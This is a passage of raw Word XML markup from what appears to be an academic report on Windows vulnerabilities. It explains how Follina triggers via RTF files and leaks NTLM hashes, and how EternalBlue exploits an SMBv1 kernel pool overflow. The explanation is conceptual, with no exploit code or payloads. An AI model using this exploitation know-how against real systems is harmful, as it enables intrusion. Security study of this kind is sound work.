            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1864886023"/>
          <w:placeholder>
            <w:docPart w:val="C7CCC0CA0C634A548B7119F24AE0A316"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="67549F2B" w14:textId="77777777" w:rsidR="00537E65" w:rsidRPr="00537E65" w:rsidRDefault="00537E65" w:rsidP="00537E65"/>
    <w:p w14:paraId="480DBB59" w14:textId="4E79CCA9" w:rsidR="00172A21" w:rsidRDefault="00172A21" w:rsidP="00172A21">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00172A21">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A75F6FF" wp14:editId="7EA15446">
            <wp:extent cx="4692747" cy="2113915"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="19685"/>
            <wp:docPr id="760259238" name="Picture 76025923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38" name="Picture 760259238" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId29"/>
                    <a:srcRect t="40581" b="1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4694327" cy="2114627"/>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1AD414B" w14:textId="78BB4BA5" w:rsidR="00172A21" w:rsidRDefault="00172A21" w:rsidP="00172A21">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc111363579"/>
      <w:bookmarkStart w:id="64" w:name="_Toc111363716"/>
      <w:bookmarkStart w:id="65" w:name="_Toc111981740"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Strict Minimum Requirements for Follina to Run</w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1738588686"/>
          <w:placeholder>
            <w:docPart w:val="44017D732F274E7198B74F889CE9F3D2"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="5FC08DBD" w14:textId="77777777" w:rsidR="00172A21" w:rsidRPr="006F246A" w:rsidRDefault="00172A21" w:rsidP="00A109D9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE080A8" w14:textId="77777777" w:rsidR="00A109D9" w:rsidRDefault="00A109D9" w:rsidP="00A109D9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006F246A">
        <w:lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> main issues are that Microsoft Office, using the MS Protocol to accept unfiltered templates from Microsoft Word and Outlook links to be loaded, and that MSDT permits code to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087AC2C" w14:textId="1D7392E4" w:rsidR="00172A21" w:rsidRDefault="00000000" w:rsidP="00A109D9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1370799345"/>
          <w:placeholder>
            <w:docPart w:val="C8BD3C6292344480AF5624A7AB3B9BA8"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[33]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A109D9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> demonstrates how the exploit still works on Microsoft Office 2021 despite having been patched. Microsoft have pointed to ‘protected view’ to prevent the exploit working, however, if the document has an .RTF file format then this just changes the exploit to a zero click exploit. Detection of this exploit is difficult as the malicious code is loaded by Word via a remote template (webserver) therefore there is nothing to detect as the document itself is not malicious</w:t>
      </w:r>
      <w:r w:rsidR="00172A21">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9E58D8" w14:textId="674CFD84" w:rsidR="003349FC" w:rsidRDefault="00172A21" w:rsidP="003349FC">
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>It is noteworthy that currently a Rich Text Format file 9.rtf) can still trigger the invocation of Follina with only the Windows Preview Pane open with the exploit as illustrated in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t>This changes the type of exploit from a ‘single click’ to a ‘zero-click’ trigger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74002DAA" w14:textId="291F1EB5" w:rsidR="00172A21" w:rsidRDefault="00172A21" w:rsidP="00172A21">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B615AAA" wp14:editId="1532EB7B">
            <wp:extent cx="4322362" cy="3871176"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="15240"/>
            <wp:docPr id="760259239" name="Picture 760259239" descr="AGk0z-MOs9U3ALZK6kMYP_LdBEQ6jH7V24XjTzYZ9Ds6WyjJzWvFl1AAGCLE8DHMS6A6e8KGbvtr24po9Cnwur1SqwQU9qwjoe8Xcx3HstU=s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Gk0z-MOs9U3ALZK6kMYP_LdBEQ6jH7V24XjTzYZ9Ds6WyjJzWvFl1AAGCLE8DHMS6A6e8KGbvtr24po9Cnwur1SqwQU9qwjoe8Xcx3HstU=s1385"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1063" t="1785" r="35254" b="2456"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4336056" cy="3883440"/>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29E9D39B" w14:textId="3BF5EE7F" w:rsidR="00172A21" w:rsidRDefault="00172A21" w:rsidP="00172A21">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc111363580"/>
      <w:bookmarkStart w:id="67" w:name="_Toc111363717"/>
      <w:bookmarkStart w:id="68" w:name="_Toc111981741"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: .rtf file opening the exploit</w:t>
      </w:r>
      <w:r w:rsidR="003349FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1125002858"/>
          <w:placeholder>
            <w:docPart w:val="F38738C3CECF47C1A859750AFEEDCBB3"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="77998D1A" w14:textId="79BE620B" w:rsidR="00172A21" w:rsidRDefault="00172A21" w:rsidP="00172A21"/>
    <w:p w14:paraId="091DACBB" w14:textId="2C15854E" w:rsidR="00A109D9" w:rsidRPr="00A109D9" w:rsidRDefault="003349FC" w:rsidP="003349FC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In addition, as the triggering payload reaches out to remote locations the connection still carries NTLM hashes, meaning that the threat actors have the victim’s Windows password (in hash format) which could be used in post-exploitation </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-2146106068"/>
          <w:placeholder>
            <w:docPart w:val="C8BD3C6292344480AF5624A7AB3B9BA8"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[32]–[36]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A109D9">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F013D7" w14:textId="6EE14BF6" w:rsidR="00CE3661" w:rsidRDefault="00A109D9" w:rsidP="00CE3661">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc113190705"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B728D7">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:r w:rsidR="00F74977">
        <w:t xml:space="preserve"> MS17-010</w:t>
      </w:r>
      <w:r w:rsidR="00185EC5">
        <w:t xml:space="preserve"> – CVE-2017-0143</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="657CB71D" w14:textId="29A6B1B4" w:rsidR="00542BA2" w:rsidRDefault="000276B2" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidR="00CE3661">
        <w:t xml:space="preserve">14 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">April </w:t>
      </w:r>
      <w:r w:rsidR="008D13FE">
        <w:t>2017</w:t>
      </w:r>
      <w:r>
        <w:t>, the hacker group</w:t>
      </w:r>
      <w:r w:rsidR="006A770E">
        <w:t xml:space="preserve"> known as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00542BA2">
        <w:t xml:space="preserve">‘The </w:t>
      </w:r>
      <w:r>
        <w:t>Shadow Brokers</w:t>
      </w:r>
      <w:r w:rsidR="00542BA2">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leaked a computer exploit </w:t>
      </w:r>
      <w:r w:rsidR="00542BA2">
        <w:t xml:space="preserve">allegedly </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from the United States National Security Agency </w:t>
      </w:r>
      <w:r w:rsidR="00542BA2">
        <w:t xml:space="preserve">(NSA) </w:t>
      </w:r>
      <w:r>
        <w:t>named EternalBlue.</w:t>
      </w:r>
      <w:r w:rsidR="00542BA2">
        <w:t xml:space="preserve"> Versions of Windows prior to version 8 are the specific targets of this exploit as they include</w:t>
      </w:r>
      <w:r w:rsidR="00783A7D">
        <w:t xml:space="preserve"> inter</w:t>
      </w:r>
      <w:r w:rsidR="00E75EC5">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00783A7D">
        <w:t>process communication share</w:t>
      </w:r>
      <w:r w:rsidR="008D13FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00783A7D">
        <w:t xml:space="preserve">(IPC$) permitting null sessions, that allow anonymous login and default null sessions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535E2FFF" w14:textId="398E1AFC" w:rsidR="00783A7D" w:rsidRDefault="004B3828" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008D13FE">
        <w:t>hreat actors can use this exploit to gain access to the network by executing arbitrary code and sending specially created packets. It does this by exploiting a vulnerability in Microsoft’s Windows Operating System</w:t>
      </w:r>
      <w:r w:rsidR="0046330C">
        <w:t xml:space="preserve"> software,</w:t>
      </w:r>
      <w:r w:rsidR="008D13FE">
        <w:t xml:space="preserve"> in particular the Server Message Block version 1 (SMBv1) protocol. The SMBv1 protocol is a file sharing protocol and is designed to allow access to remote server files</w:t>
      </w:r>
      <w:r w:rsidR="00783A7D">
        <w:t>, serial ports, printers</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00783A7D">
        <w:t xml:space="preserve"> and other miscellaneous node communications within a network</w:t>
      </w:r>
      <w:r w:rsidR="008D13FE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00783A7D">
        <w:t>SMB Protocol also provides authenticated inter</w:t>
      </w:r>
      <w:r w:rsidR="00E75EC5">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00783A7D">
        <w:t>process communications mechanisms</w:t>
      </w:r>
      <w:r w:rsidR="00D0202F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC34D37" w14:textId="668C2D17" w:rsidR="00062671" w:rsidRDefault="008D13FE" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EternalBlue </w:t>
      </w:r>
      <w:r w:rsidR="00783A7D">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> infect every device connected to the network once entry has been established making remediation time consuming as every device must be taken offline to be patched. The most well-known use of EternalBlue was the crypto-ransomware WannaCry</w:t>
      </w:r>
      <w:r w:rsidR="0066140D">
        <w:t xml:space="preserve"> and NotPetya</w:t>
      </w:r>
      <w:r w:rsidR="00A96D85">
        <w:t>, although it has been used by Trickbot (a banking trojan), CoinMiner and WannaMine.</w:t>
      </w:r>
      <w:r w:rsidR="00F74977">
        <w:t xml:space="preserve"> EternalBlue has also been known to include a payload called DoublePulsar Backdoor which is a trojan that allows remote connections against the compromised </w:t>
      </w:r>
      <w:r w:rsidR="00982A04">
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-2085596803"/>
          <w:placeholder>
            <w:docPart w:val="A9B58977D1134150A614816097915041"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[37]–[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F74977">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EADE892" w14:textId="77777777" w:rsidR="00537E65" w:rsidRDefault="00537E65" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71021A67" w14:textId="4B9785C3" w:rsidR="00D0202F" w:rsidRDefault="00543816" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">According to </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fN2ZkY2E0OGYtZWI0NC00MjdjLTk0Y2ItMmU4NWI1NDY4ZTRh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
          <w:id w:val="-955245322"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r w:rsidR="00D0202F">
        <w:t>ere are three bugs that EternalBlue exploits as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B3C8CD" w14:textId="7E08ED77" w:rsidR="00D0202F" w:rsidRDefault="00D0202F" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc113190706"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00072EBE">
        <w:t xml:space="preserve">(A) </w:t>
      </w:r>
      <w:r>
        <w:t>Wrong Casting Bug</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="275B81CB" w14:textId="43B84F59" w:rsidR="00D0202F" w:rsidRDefault="00D0202F" w:rsidP="009C6811">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>A buffer overflow is created in the non-paged kernel pool during the conversion of File Extended Attributes (FEA) from Os2 to NT structure using the Windows SMB implementation ‘srv.sys.driver’</w:t>
      </w:r>
      <w:r w:rsidR="00B030AB">
        <w:t xml:space="preserve"> due to the ‘wrong casting bug’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D22E1" w14:textId="60329552" w:rsidR="00B030AB" w:rsidRDefault="00B030AB" w:rsidP="009C6811">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>The FEA is a structure using key/value pairs: the key is AttributeName and value is AttributeValue. An example of an FEA is illustrated in figure</w:t>
      </w:r>
      <w:r w:rsidR="00A9211B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="00A9211B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99F08D" w14:textId="4B793F70" w:rsidR="00B030AB" w:rsidRDefault="00B030AB" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B030AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="795E2F44" wp14:editId="76D14575">
            <wp:extent cx="3352800" cy="1167862"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>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rotWithShape="1">
                    <a:blip r:embed="rId31"/>
                    <a:srcRect t="7113"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3353091" cy="1167963"/>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5837A84" w14:textId="4D45AF1D" w:rsidR="00B030AB" w:rsidRDefault="00B030AB" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc111363581"/>
      <w:bookmarkStart w:id="72" w:name="_Toc111363718"/>
      <w:bookmarkStart w:id="73" w:name="_Toc111981742"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Example of a File Extended Attribute</w:t>
      </w:r>
      <w:r w:rsidR="00A9211B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYWY1YmNjMTAtOTdhNy00ZTdmLTkxYWEtNDgxZjNlNmQ2ODZh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
          <w:id w:val="-75136967"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="1FC184ED" w14:textId="77777777" w:rsidR="00A9211B" w:rsidRDefault="00A9211B" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72363BD8" w14:textId="0DA883F0" w:rsidR="00A9211B" w:rsidRDefault="00A9211B" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In relation to the bug Srv0s2FeaListToNt – which converts Os2 to NT FEA list the logics are </w:t>
      </w:r>
      <w:r w:rsidR="007B0FCF">
        <w:t>set out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in figure </w:t>
      </w:r>
      <w:r w:rsidR="00537E65">
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6666E205" w14:textId="4079EADA" w:rsidR="00A9211B" w:rsidRDefault="00A9211B" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A9211B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22D0393D" wp14:editId="766A2B2B">
            <wp:extent cx="5731510" cy="1560830"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="20320"/>
            <wp:docPr id="3" name="Picture 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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1560830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20337DF8" w14:textId="55602937" w:rsidR="00A9211B" w:rsidRPr="00D0202F" w:rsidRDefault="00A9211B" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc111363582"/>
      <w:bookmarkStart w:id="75" w:name="_Toc111363719"/>
      <w:bookmarkStart w:id="76" w:name="_Toc111981743"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Logic of Srv0s2FeaListToNt Function </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYWQwZmMwNWUtMmJlNy00YmI1LWJhMGEtNjJhOWU5NTZlMGJi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
          <w:id w:val="-910534753"/>
          <w:placeholder>
            <w:docPart w:val="1ED925AF5C9F4EDAA1301A66ACA4B8EB"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="27AA8BA0" w14:textId="64334C0B" w:rsidR="00A9211B" w:rsidRDefault="00A9211B" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF920A2" w14:textId="14F61E58" w:rsidR="00A9211B" w:rsidRDefault="007B0FCF" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>The logic of size calculation when converting between 0s2FeaList and NtFeaList structures are set out in figure</w:t>
      </w:r>
      <w:r w:rsidR="00106E42">
        <w:t xml:space="preserve"> 1</w:t>
